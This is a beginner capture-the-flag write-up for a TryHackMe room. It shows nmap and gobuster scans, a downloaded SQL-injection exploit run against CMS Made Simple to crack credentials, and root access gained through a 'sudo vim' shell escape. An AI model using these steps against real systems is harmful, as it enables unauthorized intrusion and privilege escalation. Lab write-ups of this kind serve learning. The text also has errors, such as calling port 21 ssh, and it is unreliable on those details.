This is the CTF as its a Beginners CTF that is available on tryhackme, so i thought it would be a good start for the people who are interested in hacking.
When Ever we get a IP address we need to make a nmap scan so by which we would be able to understand which are the ports that are open so that we could access them. Change the below IP address with the IP of your machine that you would be provided by the THM
@kali:~$ nmap 10.10.98.233
Starting Nmap 7.91 ( https://nmap.org ) at 2021–06–16 07:25 EDT
Nmap scan report for 10.10.98.233
Host is up (0.23s latency).
Not shown: 997 filtered ports
PORT STATE SERVICE
21/tcp open ftp
80/tcp open http
2222/tcp open EtherNetIP-1
Nmap done: 1 IP address (1 host up) scanned in 16.68 seconds
from this we are able to know that there are 3 ports open and 2 are most common once 80 and 21 as 80 specifies that it has a web view and port 21 specifies ssh.
So as we have got a web view so this is what we could see as its a apache2 page, so lets see which are the other pages or folders that are present..
Now we could use any tool to find the directories, I would be using gobuster by this you will find 301,403 and 200 status code focus on 200
@kali:~$ gobuster dir -w /usr/share/wordlists/dirb/common.txt -u http://10.10.98.233/
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.98.233/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
===============================================================
2021/06/16 07:31:41 Starting gobuster in directory enumeration mode
===============================================================
/.hta (Status: 403) [Size: 291]
/.htpasswd (Status: 403) [Size: 296]
/.htaccess (Status: 403) [Size: 296]
/index.html (Status: 200) [Size: 11321]
/robots.txt (Status: 200) [Size: 929]
/server-status (Status: 403) [Size: 300]
/simple (Status: 301) [Size: 313] [ → http://10.10.98.233/simple/]
===============================================================
2021/06/16 07:33:11 Finished
===============================================================
So here we have robots.txt here the file doesn’t contain anything jucy but in many situations the files may contain some folders info, then my focus went on the /simple as this has 301 means it would be redirecting to somewhere lets see..
his has got redirected to some place which says cms made simple you may feel it doesn’t have anything that could be used but when you scroll down you will find its version so you could use searchsploit on the cmsmadesimple with version or you could search on google and go with the exploit-db there is the payload just download it.
The file would be in python2 as newer version of kali has stropped python2 in the latest upgrades so search for python2 to python3 converter or you could do that manually.
Ya it takes time to find the salt username and password so you need to wait if your system is high end then it may require less time to process it.
@kali:~$python3 cmsmssqli.py -u http://10.10.98.223/simple/ — crack -w list.txt
just check what it contains be ls and you need to cat the users.txt where you will find
G00d j0b, keep up!
Then we need to find the linux version and the different users that are present by using cat /etc/*-release we are able to see that its a ubuntu system 16.04 so lets do prevelage escalation to get the admin access we could do that using sudo vim and typing !bash we will get the bash terminal with out password
now we need to check which are all the users that are present we could check them in the /home directory,we got 2 users as one is mitch as we know and the other is sunbath.
Now lets check the root directory if there is some thing there, as suspected it contains a root file and in that directory there is a file which has root.txt so lets cat it so we got the final thing that we need.
So, i Hope this write up was helpful thank you for reading.
